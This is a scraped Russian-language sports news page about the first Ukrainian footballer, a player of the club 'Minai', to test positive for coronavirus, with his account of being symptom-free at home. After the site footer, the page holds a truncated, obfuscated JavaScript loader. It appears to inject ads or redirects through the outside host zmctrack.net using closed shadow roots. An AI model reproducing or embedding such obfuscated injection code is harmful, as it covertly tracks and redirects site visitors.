Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствует

В клубе западной Украины не открыли имя заболевшего игрока

Неделю назад стало известно, что первый футболист в Украине заразился коронавирусом. Им оказался игрок "Миная" из Закарпатья – команды первой лиги. Клуб до сих пор официально не сообщил, кто именно подхватил новую инфекцию.

Впрочем на официальном сайте "Миная" появилось интервью футболиста, сдавшего положительный тест на коронавирус. Неназванный игрок рассказал о своем здоровье:

"Слава Богу, у меня все хорошо, болезнь проходит без симптомов. Нет ни кашля, ни повышенной температуры, ни чего-то другого. Я не в больнице, как пишут, а дома – на самоизоляции. Как заразился? Контактировал с человеком, у которого позже обнаружили коронавирус. Когда узнал об этом, то мы с женой, конечно, немного испугались. У нас же ребенок. Решили для себя пойти провериться и сдали тесты. Они оказались положительными, о чем я сразу сообщил клубу.

Теперь оба – дома, на самоизоляции. Постоянно на связи с врачом. Через несколько дней будем делать повторный тест. Надеюсь, что он будет отрицательный. В таком случае смогу вернуться к тренировкам".

Мы сообщали, что названа точная дата возобновления чемпионата Украины.

Реклама

Смотрите, как соперник "Миная" в полуфинале Кубка Украины, "Динамо", играло с "Александрией"

Все подробности в спецтеме Коронавирус

	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствует

	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствует

	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствует

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Реклама

футбол
чемпионат Украины
коронавирус
Минай

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Реклама

Новости партнеров

Загрузка…

Популярные статьи

	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствует«Ввели военное положение на базе»: украинский футбольный клуб забаррикадировался на карантинеФутбол 	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствуетПервый футболист в Украине заразился коронавирусом: теперь проверят всю командуЧУ по футболу 	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствуетУ клуба украинской Премьер-лиги нет денег, чтобы проверить футболистов на коронавирусФутбол 	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствует«Баня не работает»: капитан «Динамо» рассказал, как изменилась жизнь на базе во время карантинаФутбол 	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствуетНазвана точная дата возобновления чемпионата Украины: «Шахтер» – «Динамо» и другие матчи пройдут без зрителейФутбол 	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствуетВ Минздраве сообщили, когда болельщики вернутся на трибуны в УкраинеФутбол

Новости партнеров

Загрузка…

загрузка…

	Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствует

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • Реклама на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет
.
.
.
.

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

0 Replies to “Первый украинский футболист с коронавирусом рассказал, как заразился и как себя чувствует”